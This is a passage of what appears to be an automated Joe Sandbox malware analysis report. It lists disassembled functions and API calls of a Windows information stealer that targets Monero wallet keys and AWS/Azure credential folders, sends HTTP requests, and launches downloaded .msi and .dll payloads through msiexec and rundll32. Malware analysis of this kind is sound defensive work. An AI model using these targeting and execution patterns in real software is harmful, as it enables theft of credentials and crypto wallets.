                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                              • InternetCloseHandle.WININET(00000000), ref: 00325FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 9c6050edf70c253a57d3fee9de67f052143d73b0963aadfe779a877bb2397bb0
                              • Instruction ID: e30a39168fe6c3d76b5d661cb65f89e2f727c548ea4219a0d91f760bbabb9276
                              • Opcode Fuzzy Hash: 9c6050edf70c253a57d3fee9de67f052143d73b0963aadfe779a877bb2397bb0
                              • Instruction Fuzzy Hash: E9120C72820518AADB16EBA0DCD5FEEB778BF14700F5041A9F1467B091EF702A4ADF61
                              Function 0032CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 00338B60: GetSystemTime.KERNEL32(00340E1A,0109A450,003405AE,?,?,003213F9,?,0000001A,00340E1A,00000000,?,01099048,?,\Monero\wallet.keys,00340E17), ref: 00338B86
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0032CF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0032D0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0032D0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 0032D208
                              • lstrcat.KERNEL32(?,00341478), ref: 0032D217
                              • lstrcat.KERNEL32(?,00000000), ref: 0032D22A
                              • lstrcat.KERNEL32(?,0034147C), ref: 0032D239
                              • lstrcat.KERNEL32(?,00000000), ref: 0032D24C
                              • lstrcat.KERNEL32(?,00341480), ref: 0032D25B
                              • lstrcat.KERNEL32(?,00000000), ref: 0032D26E
                              • lstrcat.KERNEL32(?,00341484), ref: 0032D27D
                              • lstrcat.KERNEL32(?,00000000), ref: 0032D290
                              • lstrcat.KERNEL32(?,00341488), ref: 0032D29F
                              • lstrcat.KERNEL32(?,00000000), ref: 0032D2B2
                              • lstrcat.KERNEL32(?,0034148C), ref: 0032D2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 0032D2D4
                              • lstrcat.KERNEL32(?,00341490), ref: 0032D2E3
                                • Part of subcall function 0033A820: lstrlen.KERNEL32(00324F05,?,?,00324F05,00340DDE), ref: 0033A82B
                                • Part of subcall function 0033A820: lstrcpy.KERNEL32(00340DDE,00000000), ref: 0033A885
                              • lstrlen.KERNEL32(?), ref: 0032D32A
                              • lstrlen.KERNEL32(?), ref: 0032D339
                                • Part of subcall function 0033AA70: StrCmpCA.SHLWAPI(01099228,0032A7A7,?,0032A7A7,01099228), ref: 0033AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 0032D3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: d31e61781da046cc1f86e62b3ce7f11532cffab766fa67a15f2b071950bdb555
                              • Instruction ID: 9dd33eb798000444158c886ce14af9397db82bceb021a1fdbe5eba515f27a5e0
                              • Opcode Fuzzy Hash: d31e61781da046cc1f86e62b3ce7f11532cffab766fa67a15f2b071950bdb555
                              • Instruction Fuzzy Hash: C1E14B72910508ABCB06EBA4DDD6EEE7778BF24300F104158F146BB191DF75AA09EF62
                              Function 0032C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0109D308,00000000,?,0034144C,00000000,?,?), ref: 0032CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0032CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0032CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0032CAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0032CAD9
                              • StrStrA.SHLWAPI(?,0109D380,00340B52), ref: 0032CAF7
                              • StrStrA.SHLWAPI(00000000,0109D170), ref: 0032CB1E
                              • StrStrA.SHLWAPI(?,0109DAE0,00000000,?,00341458,00000000,?,00000000,00000000,?,010991A8,00000000,?,00341454,00000000,?), ref: 0032CCA2
                              • StrStrA.SHLWAPI(00000000,0109DB40), ref: 0032CCB9
                                • Part of subcall function 0032C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0032C871
                                • Part of subcall function 0032C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0032C87C
                              • StrStrA.SHLWAPI(?,0109DB40,00000000,?,0034145C,00000000,?,00000000,01099218), ref: 0032CD5A
                              • StrStrA.SHLWAPI(00000000,010990B8), ref: 0032CD71
                                • Part of subcall function 0032C820: lstrcat.KERNEL32(?,00340B46), ref: 0032C943
                                • Part of subcall function 0032C820: lstrcat.KERNEL32(?,00340B47), ref: 0032C957
                                • Part of subcall function 0032C820: lstrcat.KERNEL32(?,00340B4E), ref: 0032C978
                              • lstrlen.KERNEL32(00000000), ref: 0032CE44
                              • CloseHandle.KERNEL32(00000000), ref: 0032CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: cbefe68724c0deb735fea555715eeda86e53889119ee05b42e90eef65ab1aeb1
                              • Instruction ID: 040b29e615b0304735ad9f08957b4a649bbb418e199d05949225cf702690cc6e
                              • Opcode Fuzzy Hash: cbefe68724c0deb735fea555715eeda86e53889119ee05b42e90eef65ab1aeb1
                              • Instruction Fuzzy Hash: B9E11C71910508ABDB16EBA4DCD2FEEBB78AF14300F004159F146BB191EF746A4ADF62
                              Function 00338320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              • RegOpenKeyExA.ADVAPI32(00000000,0109B308,00000000,00020019,00000000,003405B6), ref: 003383A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00338426
                              • wsprintfA.USER32 ref: 00338459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0033847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0033848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00338499
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 4bbf54a077948764791089933173081452f0726b9c6d2b2870e8f41dab61d0a1
                              • Instruction ID: 57dfdb43f9d0db14e0d8dc3b140772a6782a280cbd13bc788569458f7175f090
                              • Opcode Fuzzy Hash: 4bbf54a077948764791089933173081452f0726b9c6d2b2870e8f41dab61d0a1
                              • Instruction Fuzzy Hash: 5A811B71910218ABDB25DB54CC95FEAB7B8FF58700F008298F149AB140DF75AB89CF91
                              Function 00334D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00338DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00338E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00334DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00334DCD
                                • Part of subcall function 00334910: wsprintfA.USER32 ref: 0033492C
                                • Part of subcall function 00334910: FindFirstFileA.KERNEL32(?,?), ref: 00334943
                              • lstrcat.KERNEL32(?,00000000), ref: 00334E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00334E59
                                • Part of subcall function 00334910: StrCmpCA.SHLWAPI(?,00340FDC), ref: 00334971
                                • Part of subcall function 00334910: StrCmpCA.SHLWAPI(?,00340FE0), ref: 00334987
                                • Part of subcall function 00334910: FindNextFileA.KERNEL32(000000FF,?), ref: 00334B7D
                                • Part of subcall function 00334910: FindClose.KERNEL32(000000FF), ref: 00334B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00334EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00334EE5
                                • Part of subcall function 00334910: wsprintfA.USER32 ref: 003349B0
                                • Part of subcall function 00334910: StrCmpCA.SHLWAPI(?,003408D2), ref: 003349C5
                                • Part of subcall function 00334910: wsprintfA.USER32 ref: 003349E2
                                • Part of subcall function 00334910: PathMatchSpecA.SHLWAPI(?,?), ref: 00334A1E
                                • Part of subcall function 00334910: lstrcat.KERNEL32(?,0109E908), ref: 00334A4A
                                • Part of subcall function 00334910: lstrcat.KERNEL32(?,00340FF8), ref: 00334A5C
                                • Part of subcall function 00334910: lstrcat.KERNEL32(?,?), ref: 00334A70
                                • Part of subcall function 00334910: lstrcat.KERNEL32(?,00340FFC), ref: 00334A82
                                • Part of subcall function 00334910: lstrcat.KERNEL32(?,?), ref: 00334A96
                                • Part of subcall function 00334910: CopyFileA.KERNEL32(?,?,00000001), ref: 00334AAC
                                • Part of subcall function 00334910: DeleteFileA.KERNEL32(?), ref: 00334B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: e660003d639b4287d4a9acf7e69c52e219eb555fe9f9474e1593f1314ec17c44
                              • Instruction ID: 5e17a0225000a07867edf77c227365c698774033250889faf196add421449ae0
                              • Opcode Fuzzy Hash: e660003d639b4287d4a9acf7e69c52e219eb555fe9f9474e1593f1314ec17c44
                              • Instruction Fuzzy Hash: 2441947AA4031867D715F770EC87FED7778AB24700F004494B2856A0C1EEF5ABC99B92
                              Function 00339010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0033906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: d0cf68953510535266359f55bcec6ea7ce239bad75882d2711dfb4a47a8e8bdf
                              • Instruction ID: e45f8c846cf33d817dd678824dc188f2db0c434330dbe98531ab6813f1796ff0
                              • Opcode Fuzzy Hash: d0cf68953510535266359f55bcec6ea7ce239bad75882d2711dfb4a47a8e8bdf
                              • Instruction Fuzzy Hash: 1A71CAB5910208EBDB04EBE8DD89FEEB7B9BF58700F108508F515AB290DB74A905DF61
                              Function 00332E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 003331C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 0033335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 003334EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 0e5889855d746222fa9cc9e6676c2c8eb82eebeadf824cd742e76736c2a65ea4
                              • Instruction ID: 953e988e7a435edcbc873cc2f44d453ce298e16688c2c287ee20b57c00cff136
                              • Opcode Fuzzy Hash: 0e5889855d746222fa9cc9e6676c2c8eb82eebeadf824cd742e76736c2a65ea4
                              • Instruction Fuzzy Hash: 1912E071810608AADB1AEBA0DCD2FDEB778AF14300F504159F5467E191EF742B4ADF92
                              Function 003352C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                                • Part of subcall function 00326280: InternetOpenA.WININET(00340DFE,00000001,00000000,00000000,00000000), ref: 003262E1
                                • Part of subcall function 00326280: StrCmpCA.SHLWAPI(?,0109E7E8), ref: 00326303
                                • Part of subcall function 00326280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00326335
                                • Part of subcall function 00326280: HttpOpenRequestA.WININET(00000000,GET,?,0109E398,00000000,00000000,00400100,00000000), ref: 00326385
                                • Part of subcall function 00326280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003263BF
                                • Part of subcall function 00326280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003263D1
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00335318
                              • lstrlen.KERNEL32(00000000), ref: 0033532F
                                • Part of subcall function 00338E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00338E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00335364
                              • lstrlen.KERNEL32(00000000), ref: 00335383
                              • lstrlen.KERNEL32(00000000), ref: 003353AE
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 10a753f4cc810fb91b7d2921333899576602ae52a4c91ab7d64423c703bb8f84
                              • Instruction ID: d7ab7b19c05acdc17e34d848e53d212bbb0737c926894a7f9f6c17dad0c0e8cf
